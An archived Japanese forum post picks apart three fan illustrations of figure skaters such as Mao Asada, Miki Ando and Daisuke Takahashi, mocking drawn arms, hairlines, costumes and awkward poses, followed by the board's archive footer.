・女子表彰台、真央の右腕の肘〜手首の太さの変化がコワイ、
 左腕は二の腕が異常に細い
・同じく女子表彰台、安藤の鼻ナニソレ&衣装いい加減すぎ
 (たぶん安藤にはあまり興味がない?)
・男子表彰台、デーの生え際アリエナス
 小塚の髪ナニソレ&コスチュームそんなにダメか?
■2枚目
・エアロはみんなツッコミ済みなので割愛
・フィギュアファンと言ってる割に、膝の曲がった謎のポーズ。スパイラル?
 ジャンプ着氷時?(だとしたら足先が前に出すぎ)どう考えても重心が・・・
・すぐりんは・・・・・・・本人に失礼だとは思わないのか。
 で、腕がコワすぎだってば。
■3枚目
・デーのヒゲは去年よりはマシになったんだから、わざわざ書かなくても・・・
 で、なぜ膝の曲がった汚いポーズにする?
・織田「毎回いいコスチューム」とは、“ミノムシ”も含めるのか?
・小塚似なさすぎ
・柴田美化しすぎ

259 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)